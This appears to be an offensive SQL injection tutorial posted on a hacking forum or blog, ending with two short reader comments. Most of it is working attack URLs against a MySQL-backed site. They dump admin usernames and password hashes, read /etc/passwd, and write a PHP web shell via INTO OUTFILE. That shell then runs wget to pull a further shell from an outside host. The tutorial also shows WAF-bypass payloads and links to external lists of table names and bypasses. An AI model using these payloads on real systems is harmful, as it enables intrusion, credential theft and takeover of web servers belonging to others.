################
1. What is SQLi ?
################
SQL Injection is attack that is most often on websites, its done by injection SQL commands to MySQL database to get users/admins password.
The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL commands are thus injected from the web form into the database of an application (like queries) to change the database content or dump the database information.
################
1. Checking vulnerability.
################
There are many ways to check vulnerability here are some..
Code:
Code:
'
+and+1=1
'+or+'1'='1
'+OR+'x'='x - >x=Anything
So lets take the simplest sting " ' " now add it to the end of URL for example
Code:
Code:
http://example.com/article.php?id=4123'
Now if the site is vulnerabile you should find an error, error dosent usually mean that the site is vulnerabile the site could miss some context like images, text, or the whole page.
################
2. Getting Columns.
################
It's pretty simple to get columns from website, we use ORDER BY - is used to get column numbers.
Here is an example on our test site:
Code:
Code:
http://example.com/article.php?id=4123+order+by+1--
After trying order+by+1-- our website opens normaly, lets try ordering columns unit we get some change on the website.
Code:
Code:
http://example.com/article.php?id=4123+order+by+2--
Code:
Code:
http://example.com/article.php?id=4123+order+by+3--
Code:
Code:
http://example.com/article.php?id=4123+order+by+4--
Code:
Code:
http://example.com/article.php?id=4123+order+by+5--
Code:
Code:
http://example.com/article.php?id=4123+order+by+6--
Code:
Code:
http://example.com/article.php?id=4123+order+by+7--
Lets say on order+by+7-- we get some change; example some context is missing....
So now we know there are 6 columns, next step is the UNION command
################
3. UNION Command.
################
UNION Command helps us to gather data from certain table, for example
UNION SELECT column_name(s) FROM table_name2
So lets return on our example, union command on our example whould look like
Code:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,5,6--
Now we should get a valid column on the page so we could use it to get other information's we need. In some case the valid column is not shown, there is a trick for that, its adding - after id=-4123
The second way is adding before union adding +and+1=1
Then our example whould look like this:
1.
Code:
Code:
http://example.com/article.php?id=-4123+union+all+select+1,2,3,4,5,6--
2.
Code:
Code:
http://example.com/article.php?id=4123+and+1=1+union+all+select+1,2,3,4,5,6--
################
4. MySQL Version.
################
After getting valid ( visable ) column its time to check our MySQL Version.
So in the valid column type version(), it whould display the version of MySQL.
Lets say the valid column in our example is 5.
Code:
Code:
http://example.com/article.php
id=4123+union+all+select+1,2,3,4,version(),6--
You should check also:
Code:
Code:
version() - displays the MySQL version
user() - displays the MySQL user
database() - displays the MySQL database IN USE
There are two types of versions, MySQL 4 & MySQL 5
################
5. Table_name & Column_name
################
Now this step is pretty conected to the previous step, if you got MySQL Version 4 you have to guess tables and columns..
Code:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,5,6+from+Table--
The example whould look like this
Code:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,5,6+from+admin--
I provided mostly used tables in the next file:
Code:
Code:
http://pastebin.com/raw.php?i=pGUVF8rz
If you get an error, or the context missing you got the wrong table, in case you havent got any errors or the page displays the same you got it right..
Next step is to get columns
Code:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,username,6+from+admin--
Now the same procedure is getting columns if you got it right you should get username of some user, if not you should get an error then you have to guess the right column name.Let's guess you got the right columns; username, password.
I've provided you the most used columns :
Code:
Code:
http://pastebin.com/raw.php?i=QriucXqg
Lets get them showing in one statment using CONCAT ; concat helps you to combine two columns. like usernameassword.
Our injection using CONCAT on the table=ADMIN and knowing columns=USERNAME & PASSWORD whould look like this:
Code:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,concat(column1,column2),6+from+admin--
Now we know 2 table names lets concat them
Code:
Code:
[code]http://example.com/article.php?id=4123+union+all+select+1,2,3,4,concat(username,password),6+from+admin--
Code:
Now the output of this injection whould look like:
Code:
admin,21232f297a57a5a743894a0e4a801fc3
The password is in MD5 hash I guess you know how to crack them..
If you dont like the seperator beetwen the columns you can modify them using HEX.
Code:
Code:
http://www.ascii.cl/htmlcodes.htm
Find the value of the symbol you want ( HEX Value ), for example " : " Hex value is 3A, now for using HEX in SQL you have to put 0x before the hex value in our case it whould look like this:
Code:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,concat(username,0x3a,password),6+from+admin--
The output whould look like
Code:
Code:
admin:21232f297a57a5a743894a0e4a801fc3
Now lets get back to MySQL 5 version.
This version is mostly used nowdays, and it has more options which attacker can use.
Getting tables in MySQL version 5 is much easier, we use group_concat or just concat ( with LIMIT ) from information_schema
Information_schema is an ANSI standard set of read-only views which provide information about all of the tables, views, columns, and procedures in a database. It can be used as a source of the information which some databases make available through non-standard commands
Example of gathering tables from information_schema is :
Code:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,group_concat(table_name),6+from+infromation_schema.tables--
This will list all table_names in all database's, now we dont need that couse we have no use of tables in information_schema, we need tables from the currently used database.
We can gather tables from currently used database using [b]table_schema[b]
The example whould look like:
Code:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,group_concat(table_name),6+from+infromation_schema.tables+WHERE+table_schema=database()--
This will list all tables in the current database, WHERE clause in SQL specifies statement should only affect rows that meet specified criteria in our case after "=".
Now lets guess we got table admin, and we want to get columns from that table.
Our injection whould look like this:
Code:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,group_concat(column_name),6+from+infromation_schema.columns+WHERE+table_name=admin--
Now if we dont get anything magic_qoutes are On, we need to HEX our table name, you can use any online ASCII -> HEX converter, here is one
Code:
Code:
http://www.dolcevie.com/js/converter.html
HEX of admin = 61646d696e
Now lets inject to get columns:
Code:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,group_concat(column_name),6+from+infromation_schema.columns+WHERE+table_name=0x61646d696e--
Dont forget to add 0x before the HEX.
Now let assume we got username, password the procedure is the same
Code:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,concat(username,0x3a,password),6+from+admin--
################
6. Load_file / Into Outfile
################
Load File: Reads the file and returns the file contents as a string.
Into OutFile: Writes the selected rows to a file. The file is created on the server host, so you must have the file privilege to use this syntax. File to be written cannot be an existing file, which among other things prevents files (such as "/etc/passwd") and database tables from being destroyed.
Now with load_file we can read some files like /etc/passwd, etc..
Now if we want to read some file we can easily to that with
Code:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,load_file('/etc/passwd'),6--
If the return of the site is an error there is no use for reading further..
If we get a blank page then in that case magic_qoutes are On, in that case we can HEX it or use ASCII Value
Code:
Code:
http://www.dolcevie.com/js/converter.html
HEX value of /etc/passwd = 2f6574632f706173737764
So the injection whould look like :
Code:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,load_file(0x2f6574632f706173737764),6--
The page should contain the passwd file. If you can view /etc/passwd without HEXing then Magic_Qoutes are OFF and you can continue
Into Outfile helps us to create a new file, for successful injection magic_qoutes have to be OFF, we should have file_pirv and we should know the full path of the public_html
For finding do we have file_priv we can look into mysql schema if it exists.
In 4 step i showed you how to get version
Code:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,version(),6--
Now the same step is for user
Code:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,user(),6--
Now lets say our output is user@localhost
Code:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,concat(user,0x3a,file_priv),6+from+mysql.user--
The output whould look something like
Code:
Code:
root:Y
user:Y
If our user has Y then we have file_priv if not .....
To find full path of the site we need to make an error, when you got it lets say its /home/slixme/public_html/
There are many query's for Into Outfile we'll use CMD
Code:
Code:
http://example.com/article.php?id=4123+union+all+select+null,null,null,null,"<? system($_GET['cmd']); ?>",null+into+outfile+'/home/slixme/public_html/shell.php'--
Change all columns to null except the one injection, after injecting this you can go to
Code:
Code:
http://example.com/shell.php
And using CMD command lets get our shell
Code:
Code:
http://example.com/shell.php?cmd=wget www.website.com/slixme.txt;mv slixme.txt slixme.php
Now WGET Command will download the slixme.txt ( Our SHELL .php IN TXT file ) to our site, and the MV command will rename it to slixme.php so it can be executed.
Now if you find yourself in the position in wich you cant get the full path of the site you can, you can use INTO OUTFILE to dump certain columns into .txt file.
Lets say you want to dump
Code:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,concat(username,0x3a,password),6+from+admin--
Now find a writable dir in side the server, most ( allmost all, Linux all ) servers chmod their tmp folder into 777 ( Writable )
So lets dump the usernames and passwords so you can download it...
Code:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,concat(username,0x3a,password),6+from+admin+into+outfile+'/tmp/userpass.txt'--
Now the usernameassword have been dumped into userpass.txt file, now lets open them using load_file
Code:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,load_file('/tmp/userpass.txt'),6-
You should get the dump..
################
6. WAF - Web aplicaiton firewall
################
An application firewall is a form of firewall which controls input, output, and/or access from, to, or by an application or service. It operates by monitoring and potentially blocking the input, output, or system service calls which do not meet the configured policy of the firewall. The application firewall is typically built to control all network traffic on any OSI layer up to the application layer. It is able to control applications or services specifically, unlike a stateful network firewall which is - without additional software - unable to control network traffic regarding a specific application. There are two primary categories of application firewalls, network-based application firewalls and host-based application firewalls.
More info :
Code:
Code:
https://www.owasp.org/index.php/Web_Application_Firewall
http://www.akamai.com/dl/brochures/Product_Brief_Kona_WAF.pdf
The first sign of WAF On the SQL Injection is on the command Union
Code:
Code:
http://example.com/article.php?id=-4123+union+all+select+1,2,3,4,5,6--
We get an error 403 Forbidden
There are multiple ways for bypassing WAF the most simplest one is
Code:
Code:
http://example.com/article.php?id=-4123/**/union/**/select/**/1,2,3,4,5,6/*
We have successfuly bypassed the WAF
Now the bypass depends on you imagination, and inspiration..
I provided you with some WAF Bypass's.
Code:
Code:
http://pastebin.com/XaQfMQCp
################
6. The End
################
contact me please, we need to talk... TJOMGWIRE@programmer.net Kanishk Bhargava
ReplyDeleteso.. where can we met?
Delete